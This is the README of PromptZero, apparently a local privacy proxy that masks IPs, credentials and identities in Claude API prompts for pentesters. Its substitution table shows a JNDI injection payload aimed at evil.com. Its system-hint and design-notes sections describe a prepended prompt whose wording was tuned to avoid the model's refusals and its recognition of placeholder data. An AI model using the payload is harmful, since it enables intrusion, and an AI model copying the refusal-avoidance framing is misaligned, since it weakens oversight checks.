image\n\n---\n\n## License\n\nMIT — free to use, modify, distribute.\nAttribution appreciated but not required.\n\n---\n\n---\n\n# Spanish Version\n\n---\n\n## What is PromptZero?\n\n**PromptZero applies Zero Trust principles to LLM interactions.** It is a\nlocal, transparent proxy that detects and replaces sensitive data (identities,\ninfrastructure, secrets, client material) in your prompts **before** they\ncross the perimeter of your environment, and restores the real values in the response.\n\n*Zero trace. Full answer.*\n\n---\n\n## The Problem\n\nYou use AI to analyze logs, write pentest reports, review code, summarize\ncontracts. 
Cada prompt que enviás contiene IPs reales, hostnames, nombres, credenciales,\nidentificadores de cliente, payloads — y cada byte cruza un borde que vos no controlás.\n\nLos contratos del vendor y los SaaS de \"Private AI\" no resuelven esto — solo desplazan\nla confianza hacia otro tercero. PromptZero maneja el borde localmente y te deja\nverificarlo end-to-end con las mismas herramientas que ya usás para auditar\ncualquier otra API (Burp, mitmproxy).\n\n---\n\n## Cómo Funciona\n\n```\nTU ENTORNO  (trusted)\n┌─────────────────────────────────────────────────────────────┐\n│                                                             │\n│  Cliente Claude ──▶ PromptZero (localhost:8000)             │\n│  (CLI \u002F SDK \u002F         │                                     │\n│   curl)               ① Detectar spans sensibles            │\n│       ▲               ② Reemplazar con valores sintéticos   │\n│       │               ③ Reenviar prompt limpio              │\n│       └───────────────④ Recibir respuesta del modelo        │\n│                       ⑤ Restaurar valores reales            │\n│                                                             │\n│         ✗ Los datos sensibles NUNCA cruzan este límite      │\n└───────────────────────────────────┬─────────────────────────┘\n                                    │   ← TRUST BOUNDARY\n                                    │   Solo datos sintéticos\n                             ┌──────▼──────┐\n                             │ api.anthropic │   (untrusted —\n                             │     .com      │   verificable\n                             │               │   con Burp \u002F\n                             └───────────────┘   mitmproxy)\n```\n\n---\n\n## Datos que protege\n\n| Categoría | Real → Sintético | Detección |\n|---|---|---|\n| IPv4 | `45.77.12.91` → `198.51.100.1` (RFC 5737) | Regex |\n| IPv6 | `2001:abcd::1` → `2001:db8::1` (RFC 3849) | Regex |\n| Hostname \u002F FQDN | `vpn.empresa.com` → 
`alpha.example.com` (RFC 2606) | Regex + NLP (URL) |\n| URL | `https:\u002F\u002Fapi.empresa.com\u002Fv2` → `https:\u002F\u002Fbravo.example.com\u002Fv2` | Regex + NLP |\n| host:port | `db.internal:5432` → `charlie.example.com:5432` | Regex |\n| Email | `juan@empresa.com` → `user001@example.com` (RFC 2606) | Regex + NLP |\n| Credencial | `password='S3cur3P@ss!'`, `Authorization: Bearer …`, `\"secret\":\"…\"` → `sk-faux-0001-xxxxxxxxxxxxxxxx` | **Regex (key-aware)** |\n| Teléfono (US\u002FCA) | `+1-555-123-4567` → `+1-555-000-0001` | Regex + NLP |\n| Teléfono (LatAm + ES) | `+54 11 4444-5555`, `+56 9 1234 5678`, `+34 612 345 678`, `+52 55 1234 5678`, `+57 300 123 4567`, `+598 99 123 456` → `+1-555-000-0001` | **Regex (LatAm\u002FES)** |\n| Nombre de persona | `Juan García`, `María Fernández` | **NLP (spaCy en+es)** |\n| Empresa \u002F Organización | `Empresa XYZ S.A.`, `Nexabank Financial S.A.` | **NLP (spaCy en+es)** |\n| DNI Argentina | `DNI 28.456.123` → `DNI 11.111.001` | **Regex (AR)** |\n| CUIT\u002FCUIL Argentina | `20-12345678-9` → `20-11111001-1` | **Regex (AR)** |\n| RUT Chile | `12.345.678-K` → `11.111.001-1` | **Regex (CL)** |\n| DNI\u002FNIE España | `12345678A`, `X1234567A` → `X0000001A` | **Regex (ES) + NLP** |\n| CI Uruguay | `1.234.567-8` → `1.111.001-1` | **Regex (UY)** |\n| Cédula Colombia | `CC 1.234.567` → `CC 1.111.001` | **Regex (CO)** |\n| CURP México | `AAAA000000HAAAAA00` → `FAKE000001HDFXXX11` | **Regex (MX)** |\n| RFC México | `AAAA000000AAA` → `FAKE000001XX1` | **Regex (MX)** |\n| Pasaporte | `AAB123456` → `XX0000001` | **NLP (Presidio)** |\n| SSN (US) | `123-45-6789` → `000-00-0001` | Regex + NLP |\n| Tarjeta de crédito | `4111 1111 1111 1234` → `4111-1111-1111-0001` | Regex + NLP |\n| IBAN | `GB29NWBK60161331926819`, `AR1500011110000…` → `FAKEIBAN000…` | NLP |\n| Token \u002F API key (≥32 chars) | `sk-ant-api03-xxxxxx...` → `FAKE_TOKEN_0001_xxxxxxxx` | Regex |\n| Payload con host | `${jndi:ldap:\u002F\u002Fevil.com}` → 
`${jndi:ldap:\u002F\u002Fbravo.example.com}` | Regex |\n\n> **Sustituciones pensadas para pentest:** todos los fakes viven dentro\n> de rangos reservados por IANA para documentación (RFC 5737 para IPv4,\n> RFC 3849 para IPv6, RFC 2606 para `example.com`). El modelo los trata\n> como targets opacos no-existentes, **sin** la semántica de \"loopback \u002F\n> lab interno\" que arrastraban las versiones anteriores (`127.0.0.x`,\n> `*.localhost`) — semántica que silenciosamente downgradeaba la\n> severidad de hallazgos de exposición externa. Ver\n> [Notas de diseño](#notas-de-diseño--por-qué-examplecom--system-hint).\n\n---\n\n## Arquitectura\n\n```\npromptzero\u002F\n├── main.py          ← Proxy FastAPI (drop-in para api.anthropic.com)\n├── sanitizer.py     ← Motor de detección: NLP (Presidio+spaCy) + Regex\n├── setup.sh         ← Setup en un comando\n├── requirements.txt\n├── .env.example\n└── examples\u002F\n    ├── poc\u002F                ← PoC: 5 datasets ficticios + demos local\u002FHTML\u002FE2E\n    ├── document_summary\u002F   ← Summary de PDF\u002FDOCX\u002FTXT con protección PII\n    └── pentest_report\u002F     ← Reportes técnicos\u002Fejecutivos desde findings JSON\n```\n\n### Capas de detección\n\n```\nTexto de entrada\n    │\n    ├─▶ [ Capa NLP — Presidio + spaCy (en + es) ]\n    │     PERSON, ORGANIZATION, PHONE, EMAIL,\n    │     CREDIT_CARD, IBAN, SSN, PASSPORT,\n    │     NATIONAL_ID (ES_NIF, NRP), URL, IP_ADDRESS\n    │\n    ├─▶ [ Capa Regex — IDs nacionales por país ]\n    │     AR: DNI, CUIT\u002FCUIL          CL: RUT\n    │     ES: DNI\u002FNIE                 UY: CI\n    │     CO: Cédula (CC)             MX: CURP, RFC\n    │     Teléfonos: +34 +52 +54 +55 +56 +57 +598\n    │\n    ├─▶ [ Capa Regex — red e infraestructura ]\n    │     IPv4, IPv6, hostnames, host:port,\n    │     tokens\u002FAPI keys largos, URLs\n    │\n    └─▶ [ Merge + deduplicación por span ]\n          └─▶ Reemplazar real → sintético\n                └─▶ Guardar en tabla de 
mapping por sesión\n```\n\n### Tabla de mapping por sesión\n\nCada conversación tiene una **tabla bidireccional real↔ficticio scoped a la sesión**.\nEl mismo valor real siempre mapea al mismo valor sintético dentro de la sesión —\nasí tus conversaciones quedan coherentes de punta a punta.\n\n```\nSesión: \"pentest-acmecorp-2026\"\n──────────────────────────────────────────────────\nValor real                   Valor sintético\n──────────────────────────────────────────────────\n192.168.1.45        ←──────▶  198.51.100.1\ndb.prod.acme.com    ←──────▶  alpha.example.com\nJuan García         ←──────▶  Soren Brännström\nadmin@acme.com      ←──────▶  user001@example.com\nS3cur3P@ss!         ←──────▶  sk-faux-0001-xxxxxxxxxxxxxxxx\n──────────────────────────────────────────────────\n       Guardada en local. Nunca se envía a ningún lado.\n```\n\n---\n\n## Inicio rápido\n\nHay dos formas de correr el proxy. El comportamiento es idéntico — usás\nla que mejor te encaje.\n\n### Opción A — Docker (recomendado)\n\nSin Python, sin virtualenv, sin descarga de modelos. La imagen publicada\nya trae los modelos adentro (linux\u002Famd64 + linux\u002Farm64). Pull y run:\n\n```bash\ndocker run -p 8000:8000 \\\n    -e ANTHROPIC_API_KEY=sk-ant-... \\\n    ghcr.io\u002Fopenbashok\u002Fpromptzero:latest\n# Escuchando en http:\u002F\u002Flocalhost:8000\n```\n\nVariantes comunes:\n\n```bash\n# Pasar un .env entero (ANTHROPIC_API_KEY + UPSTREAM_PROXY + …)\ndocker run -p 8000:8000 --env-file .env ghcr.io\u002Fopenbashok\u002Fpromptzero\n\n# Rutear el hop upstream por Burp corriendo en el host (macOS \u002F Windows)\ndocker run -p 8000:8000 --env-file .env \\\n    -e UPSTREAM_PROXY=http:\u002F\u002Fhost.docker.internal:8080 \\\n    -e UPSTREAM_VERIFY=false \\\n    ghcr.io\u002Fopenbashok\u002Fpromptzero\n```\n\nO buildea local si preferís:\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fopenbashok\u002Fpromptzero && cd promptzero\ndocker build -t promptzero .                       
# modelos 'lg', ~1.5 GB\ndocker build --build-arg SPACY_SIZE=sm -t promptzero:slim .   # ~300 MB\n```\n\n### Opción B — Instalación nativa\n\nÚtil si querés hackear el proxy o preferís dejar el venv en tu host.\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fopenbashok\u002Fpromptzero\ncd promptzero\n\n.\u002Fsetup.sh                 # venv + deps + modelos spaCy en+es (~1 GB)\ncp .env.example .env       # poner ANTHROPIC_API_KEY=sk-ant-...\npython main.py             # escuchando en http:\u002F\u002Flocalhost:8000\n```\n\n`.\u002Fsetup.sh` baja los modelos `lg` por default. Variantes: `.\u002Fsetup.sh\nmedium` (~40 MB), `.\u002Fsetup.sh small` (~12 MB), o `.\u002Fsetup.sh en-only`\nsi solo procesás inglés.\n\nDespués, en tu app:\n\n```python\nimport anthropic\n\nclient = anthropic.Anthropic(\n    api_key=\"tu-api-key\",\n    base_url=\"http:\u002F\u002Flocalhost:8000\",   # ← único cambio\n)\n```\n\n---\n\n## Uso\n\n### Python SDK\n\n```python\nimport anthropic\n\nclient = anthropic.Anthropic(base_url=\"http:\u002F\u002Flocalhost:8000\", api_key=\"…\")\nmsg = client.messages.create(\n    model=\"claude-opus-4-6\",\n    max_tokens=1024,\n    messages=[{\"role\": \"user\", \"content\":\n        \"Analizá el log: cliente Juan García (juan@empresa.com) \"\n        \"se conectó desde 192.168.1.45 a db.prod.empresa.com\"\n    }],\n    extra_headers={\"x-session-id\": \"sesion-1\"},  # ← mantiene mappings consistentes\n)\n# → La respuesta de Claude tiene los valores reales restaurados.\n```\n\n### curl\n\n```bash\ncurl -X POST http:\u002F\u002Flocalhost:8000\u002Fv1\u002Fmessages \\\n  -H \"x-api-key: $ANTHROPIC_API_KEY\" \\\n  -H \"anthropic-version: 2023-06-01\" \\\n  -H \"content-type: application\u002Fjson\" \\\n  -d '{\n    \"model\": \"claude-opus-4-6\",\n    \"max_tokens\": 1024,\n    \"messages\": [{\"role\":\"user\",\"content\":\"…tu prompt con datos sensibles…\"}]\n  }'\n```\n\n### Endpoints de administración\n\n```bash\nGET    \u002Fhealth              
            # estado + upstream + flag inject_system_hint\nGET    \u002Fstats                           # contadores acumulados desde startup\nGET    \u002Fsessions\u002F{session_id}\u002Fmappings  # tabla real↔ficticio (debug)\nGET    \u002Fsessions\u002F{session_id}\u002Faudit     # request sanitizado + response desanitizado\n                                         # — prueba de no-leak. Requiere DEBUG_AUDIT=1.\nDELETE \u002Fsessions\u002F{session_id}           # resetea la tabla (y el audit log) de la sesión\n```\n\nPara métricas acumuladas en vivo:\n\n```bash\nwatch -n 1 'curl -s localhost:8000\u002Fstats | jq'\n```\n\nTe tira algo así, actualizándose cada segundo:\n\n```json\n{\n  \"uptime_seconds\": 142.3,\n  \"requests\": { \"total\": 7, \"messages\": 5, \"passthrough\": 1, \"errors\": 0 },\n  \"bytes\":    { \"sanitized_in\": 12480, \"desanitized_out\": 28350 },\n  \"pii_spans\": {\n    \"total_unique\": 47,\n    \"by_kind\": { \"person\": 8, \"org\": 5, \"ipv4\": 14, \"hostname\": 9,\n                 \"email\": 6, \"national_id_ar_dni\": 3, \"phone\": 2 }\n  }\n}\n```\n\nAdemás la terminal del proxy imprime **una línea coloreada por request**\nmostrando exactamente lo que se sanitizó, útil para verificar en tiempo\nreal qué datos sensibles se enmascararon en cada turno cuando corrés Claude Code (o\ncualquier cliente) al lado:\n\n```\n[trace] POST \u002Fv1\u002Fmessages     session=poc-pent  +4 spans (total 4: 1 phone, 1 email, 1 ipv4, 1 url)  in= 197B out= 494B  200 2012ms\n[trace] POST \u002Fv1\u002Fmessages     session=poc-pent  +3 spans (total 7: 2 ipv4, 1 person, 1 hostname)  in= 185B out= 697B  200 1273ms\n[trace] GET   \u002Fv1\u002Fmodels           (passthrough, no sanitization)  200  367ms\n```\n\n---\n\n## Usar con Claude Code CLI\n\nEl proxy es drop-in para `api.anthropic.com`. 
Para que Claude Code vaya por PromptZero:\n\n```bash\n# Terminal 1 — PromptZero corriendo\npython main.py\n\n# Terminal 2 — Claude Code apuntando al proxy\nexport ANTHROPIC_BASE_URL=http:\u002F\u002Flocalhost:8000\nclaude\n# Cada prompt que tipeás se sanitiza antes de llegar a Claude,\n# y las respuestas se desanonimizan antes de llegar a tu terminal.\n```\n\nEl proxy maneja toda la superficie de la API:\n\n| Ruta | Comportamiento |\n|---|---|\n| `POST \u002Fv1\u002Fmessages`              | Sanitizado → forward. Response desanitizado. Streaming OK. |\n| `POST \u002Fv1\u002Fmessages\u002Fcount_tokens` | Sanitizado para que el conteo refleje el prompt real enviado. |\n| Cualquier otra `\u002Fv1\u002F*`           | Forward sin tocar (`models`, `organizations`, `files`, `batches`, …) |\n\n---\n\n## Inspeccionar el tráfico upstream con Burp Suite\n\nNo te quedes con nuestra palabra — ruteá la conexión upstream\n(PromptZero → `api.anthropic.com`) a través de Burp y auditá cada byte\nvos mismo.\n\n```bash\n# En .env:\nUPSTREAM_PROXY=http:\u002F\u002F127.0.0.1:8080\nUPSTREAM_CA_BUNDLE=\u002FUsers\u002Fvos\u002Fburp-ca.pem    # opción recomendada\n# o, para una demo rápida (inseguro):\n# UPSTREAM_VERIFY=false\n```\n\nPasos:\n\n1. Exportá el CA de Burp como PEM: `Burp → Proxy → Settings → Import\u002Fexport CA → PEM`\n2. Habilitá el listener de Burp en `127.0.0.1:8080`\n3. Editá `.env` con las variables de arriba, reiniciá `python main.py`\n4. `curl localhost:8000\u002Fhealth` → tiene que mostrar el `upstream_proxy` activo\n5. Ejecutá tu cliente (Claude Code, `demo_html.py`, lo que sea)\n6. Mirá en Burp **Proxy → HTTP history**: cada request a `api.anthropic.com`\n   muestra el body **sanitizado**. Filtrá por valores reales (`nexabank`,\n   tu IP) → **vacío**. 
Esa es la prueba.\n\n```\n┌─────────┐  HTTP   ┌────────────┐  HTTPS   ┌──────────┐  HTTPS  ┌─────────────────┐\n│ Claude  │────────▶│ PromptZero │─────────▶│   Burp   │────────▶│ api.anthropic   │\n│  CLI    │  claro  │   :8000    │  TLS     │  :8080   │  TLS    │     .com        │\n└─────────┘         │ sanitiza   │          │  MITM    │         └─────────────────┘\n                    │ desanitiza │          │ inspect  │\n                    └────────────┘          └──────────┘\n```\n\n---\n\n## Ejemplos incluidos\n\n### Proof of Concept\n\n5 datasets ficticios (datos personales, engagement de pentest completo con\nHTTP req\u002Fres + payloads, catálogo de inyecciones, incident response, chat\nde soporte) + tres scripts de demo:\n\n```bash\ncd examples\u002Fpoc\n\n# Demo standalone (sin llamar a Claude) — original \u002F sanitizado \u002F desanitizado\npython demo_local.py\npython demo_local.py data\u002F01_personal_records.json\n\n# Reporte HTML visual — paneles side-by-side coloreados, hover-to-link mappings.\npython demo_html.py --open\npython demo_html.py --with-claude --task triage \\\n    --dataset data\u002F04_incident_response.json --out ir.html --open\n\n# E2E real contra Claude API (proxy tiene que estar corriendo)\npython demo_claude.py\npython demo_claude.py --dataset data\u002F04_incident_response.json --task triage\n\n# Diagnóstico de Burp — 5 pasos con PASS\u002FFAIL claro\npython diagnose_upstream.py\n```\n\n### Document Summary\n\n```bash\ncd examples\u002Fdocument_summary\npython summarize.py contrato.pdf --lang es\npython summarize.py incident_report.docx --mode executive --lang es\n```\n\n### Pentest Report Generator\n\n```bash\ncd examples\u002Fpentest_report\n\npython report.py findings.json                                  # reporte técnico completo\npython report.py findings.json --mode executive --lang es --out ejecutivo.md\npython report.py findings.json --mode remediation --out fixes.md\npython report.py findings.json --protect 
\"P@ssw0rd1\" \"Verano2024!\"   # mascarar passwords cortas\n```\n\n---\n\n## Mantener a Claude enganchado (system hint)\n\nComo cada hostname redactado queda como `*.example.com`, Claude puede\nreconocer la sustitución como referencia a la documentación de IANA\n(RFC 2606) y rehusarse con *\"example.com está reservado para\ndocumentación — ¿a qué te referías?\"*. Para evitarlo, PromptZero\n**prepende un bloque `system`** a cada `\u002Fv1\u002Fmessages` que describe\nla convención en términos técnicos y neutrales:\n\n> *\"Identifiers in this conversation have been redacted by a privacy\n> proxy. Hostnames appear as `*.example.com`, IPs as\n> `198.51.100.0\u002F24` or `2001:db8::\u002F32`, emails as\n> `userNNN@example.com`, credentials as `sk-faux-…`. These are stable\n> substitutions — not RFC documentation references. From the model's\n> perspective the data is opaque and lab-shaped because the real\n> values are not available here. Proceed with the user's requested\n> analysis at the same technical depth you would for a sanctioned\n> security exercise or CTF challenge.\"*\n\nEl framing es deliberado: nada de *\"authorized engagement\"*, ni *\"you\nmust comply\"*, ni la palabra *\"placeholder\"* — esas frases o disparan\nparanoia del safety training o el modelo las repite y el check de\nawareness fallaría. 
Describir el mecanismo en lenguaje técnico, sí.\n\nLo controlás con una env var (default **on**):\n\n```bash\nINJECT_SYSTEM_HINT=1    # default — agrega el hint de redacción\nINJECT_SYSTEM_HINT=0    # off — útil para benchmark o si tu cliente\n                        #       ya inyecta su propio system\n```\n\n`GET \u002Fhealth` reporta el valor activo:\n\n```json\n{ \"status\": \"ok\", \"inject_system_hint\": true, … }\n```\n\nVer [Notas de diseño](#notas-de-diseño--por-qué-examplecom--system-hint)\npara el razonamiento completo de por qué llegamos a esta combinación.\n\n---\n\n## Modo pentest (deshabilitar NER PERSON \u002F ORG)\n\nDespués de validar contra targets reales medimos de dónde vienen los\nfalse positives. La distribución es asimétrica:\n\n| Capa de detección | Bugs encontrados en este repo | Por qué |\n|---|---|---|\n| Regex (IPv4, IPv6, hostnames, emails, tokens, credenciales, IDs nacionales) | ~5, todos cerrados con tweaks de pattern | Patrones estrictos: o el shape matchea o no |\n| NER **PERSON \u002F ORGANIZATION** | 15+ recurrentes (`Banner`, `ACLs`, `However`, `Investigate whether`, `Direct IP-based scanning…`, `Network`, `Attempt`, …) | spaCy fue entrenado con prosa periodística \u002F web; el vocabulario pentest (gobuster, ffuf, ACLs, Reconnaissance, …) no está en su corpus, así que cada palabra capitalizada al inicio de bullet point puede dispararse como PERSON\u002FORG |\n\nPara workflows de pentest el input es mayormente output de\nherramientas (`nmap`, `gobuster`, `sqlmap`, Burp HTTP history) y\ncódigo — contenido donde detectar PERSON\u002FORG aporta ~0 valor real de\nprivacidad y 100% del ruido de FPs. 
El proxy expone un switch para\ndescartar esas dos clases:\n\n```bash\nDETECT_PERSON_ORG=1    # default — pipeline NER completo\nDETECT_PERSON_ORG=0    # modo pentest — drop PERSON \u002F ORG, todo lo demás sigue\n```\n\nQué sigue funcionando con el flag en off: IPv4, IPv6, hostnames,\nURLs, host:port, emails, IDs nacionales (AR\u002FCL\u002FES\u002FUY\u002FCO\u002FMX),\ntarjetas de crédito, IBAN, SSN, teléfonos, API tokens, credenciales\nkey-aware. Qué deja de detectarse: nombres de personas \u002F\norganizaciones en narrativa libre.\n\n`GET \u002Fhealth` reporta el valor activo:\n\n```json\n{ \"status\": \"ok\", \"detect_person_org\": false, … }\n```\n\nCuándo usar cada modo:\n\n- **`DETECT_PERSON_ORG=1`** (default) — incident reports, document\n  summaries, chats de soporte, cualquier cosa escrita por humanos\n  donde querés redactar nombres de auditor \u002F contacto \u002F cliente.\n- **`DETECT_PERSON_ORG=0`** — Claude Code apuntando al proxy para\n  engagements de pentest activo, triage de logs, code review sobre\n  shell output, herramientas automatizadas que producen texto\n  técnico estructurado.\n\n---\n\n## Suite de tests de integración\n\n`examples\u002Fpoc\u002Fintegration_test.py` ejecuta llamadas reales a Claude\ncontra el proxy y chequea cuatro invariantes por escenario — útil\ncomo regression runner después de cualquier cambio al sanitizer, y\ncomo sanity check antes de meterte en un engagement real:\n\n| Check | Qué verifica |\n|---|---|\n| **L** leak       | Ningún valor real esperado aparece en el payload upstream que recibió Anthropic |\n| **N** ner-recall | Todos los valores reales esperados están en la tabla de mapping de la sesión |\n| **R** round-trip | Ningún fake quedó en el reply desanonimizado (toda sustitución fue revertida) |\n| **A** awareness  | El modelo no marca la data como test \u002F placeholder \u002F fictional |\n\nTrae 6 escenarios listos (pentest report single-turn, log triage,\ntransformation resistance, JSON payload, code 
review, más un escenario\nmulti-turn de 3 turnos para re-sanitización del historial):\n\n```bash\n# Arrancar el proxy con DEBUG_AUDIT=1 para que el runner pueda leer \u002Faudit\nDEBUG_AUDIT=1 python main.py\n\n# En otra terminal\npython examples\u002Fpoc\u002Fintegration_test.py \\\n    --proxy http:\u002F\u002F127.0.0.1:8000 \\\n    --model claude-haiku-4-5\n```\n\nEl output es PASS\u002FFAIL por escenario más un punch-list de checks\nfallados — la suite cazó cuatro bugs reales mientras la construíamos\n(truncado de URLs por Presidio, leak de passwords cortas, colisión\ndel pool de fakes IPv6, falsos positivos de hostname sobre\nidentificadores de Python) antes de que ninguno llegara a producción.\n\n---\n\n## Notas de diseño — Por qué `example.com` + system hint?\n\nRazonamiento detrás de las decisiones de sustitución, por si querés\nforkear o ajustar el proxy para otra familia de LLM u otro modelo de\nriesgo. Iteramos tres estrategias distintas de fake-domain, cada una\ncon un trade-off diferente.\n\n**1. Fakes con sabor a loopback (versiones tempranas: `127.0.0.x` \u002F\n`*.localhost` \u002F `userNNN@fakecorp.local`).** El round-trip funcionaba\npero cambiaba silenciosamente el razonamiento de Claude: hallazgos\nde exposición externa quedaban enmarcados como \"servicio interno \u002F\nloopback, criticidad menor\". Para un reporte de pentest esto\nsignifica que el modelo **downgradea la severidad** sin avisarte.\nDescartado.\n\n**2. Dominios reales-plausibles (ej. `acme-corp.io`, `nexabank.com`).**\nDos fallas:\n- El modelo reconoce la marca de su corpus de entrenamiento y aplica\n  conocimiento del mundo real (\"Nexabank usa Spring Boot, así que…\")\n  contaminando el análisis con hechos alucinados sobre una empresa\n  real.\n- Nombres como *Acme Corp*, *Globex*, *Initech*, *Umbrella Tech* son\n  EXACTAMENTE los placeholders que Claude usa cuando **inventa**\n  ejemplos ficticios en su propia narrativa. 
El modelo los escribe\n  sin que se los hayamos enviado; el desanitizer entonces los mapea\n  a lo que sea que viva en la tabla de sesión (a menudo un falso\n  positivo de NLP como `Credential → Bob Calloway`) y corrompe el\n  output visible al usuario.\n\n**3. Rangos reservados de IANA para documentación (actual).** RFC\n5737 (`198.51.100.0\u002F24`, `203.0.113.0\u002F24`), RFC 3849\n(`2001:db8::\u002F32`), RFC 2606 (`example.com`). Claude los tiene en su\ncorpus de entrenamiento **como placeholders**, así que no pulleea\nhechos del mundo real sobre ellos y no aplica semántica de loopback\nni de interno-solamente. Los pools de nombres (`Soren Brännström`,\n`Nordhaven Holdings`, …) son invenciones europeas deliberadamente\npoco comunes que Claude **no** emite espontáneamente al escribir\nejemplos.\n\nEl trade-off: con `*.example.com` el modelo a veces reconoce la\nsustitución y pregunta *\"example.com está reservado para\ndocumentación — ¿a qué te referías?\"*. Ahí entra el\n**[system hint](#mantener-a-claude-enganchado-system-hint)**: un\nbloque corto, neutral, técnico, prependido a cada request, que\nexplica el mecanismo de redacción y le indica al modelo que opere\ncon la misma profundidad que un ejercicio de seguridad sancionado.\nDefusea el reconocimiento sin sonar a jailbreak — probamos framings\ncon *\"authorized engagement\"*, *\"you must comply\"*, *\"real\npentest\"*, y todos aumentaron la tasa de refusal porque pegan\ndirecto contra el safety pattern. Describir el mecanismo, no.\n\nSi tu use case **no** es pentesting — por ejemplo, generar contenido\nde training donde el framing de lab ayuda — desactivá el hint con\n`INJECT_SYSTEM_HINT=0`. 
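La sustitución sigue siendo idéntica.\n\n---\n\n## Sobre OpenBash\n\n**PromptZero** es un proyecto de [OpenBash.com](https:\u002F\u002Fopenbash.com) —\nuna comunidad construida **de pentesters para pentesters**.\n\nConstruimos herramientas de seguridad open source para que la comunidad pueda\ntrabajar mejor, mantenerse protegida y conservar sus datos sensibles donde corresponde: en casa.\n\nSi esta herramienta te sirve, compartila. Si encontrás un bug, abrí un issue.\nSi la mejorás, mandá un PR.\n\n---\n\n*Made with ♥ by the OpenBash community*\n","PromptZero is a local, transparent proxy built on a Zero Trust architecture for interactions with large language models (LLMs). It detects and replaces sensitive information in prompts (such as IP addresses, hostnames, and credentials) before the data leaves your environment, and restores the real values when the response comes back, keeping personally identifiable information (PII) and sensitive data protected. The project is written in Python and suits scenarios that need to protect internal data privacy when interacting with external AI services (for example, the Claude API); it is particularly well suited to information security testers and red team members. By keeping the trust boundary local, PromptZero gives users a verifiable security solution.",2,"2026-06-11 04:02:20","CREATED_QUERY"]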